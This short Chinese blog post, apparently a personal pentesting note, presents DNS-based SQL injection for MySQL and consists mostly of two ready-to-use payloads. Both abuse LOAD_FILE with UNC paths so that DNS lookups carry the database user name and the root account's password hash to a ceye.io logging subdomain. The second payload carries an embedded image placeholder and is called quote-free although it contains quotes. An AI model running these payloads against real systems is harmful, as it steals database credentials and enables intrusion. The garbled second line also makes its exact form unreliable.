0x01 杂言
最近实在是太忙了,考试都排满了,晚上刚考完,补一下昨天的东西,写一下dns注入。
我们知道在盲注的时候,要用脚本去跑,在测试的时候效率就不是很高,这时候用dns注入往往事半功倍
0x02 payload
这里直接贴一下payload
LOAD_FILE(CONCAT(0x5C5C,(HEX(USER())),0x2E3563733076642E636579652E696F5C313233))
下面这个是没有引号的
SELECT LOAD_FILE(CONCAT('\\',(SELECT password FROM mysql.user WHERE user='root' LIMIT 1),'.[图片]mysql.ip.port.xxxx.ceye.io\abc'));
这里上面的地址可以用ceye.io这个网站去看dns的解析记录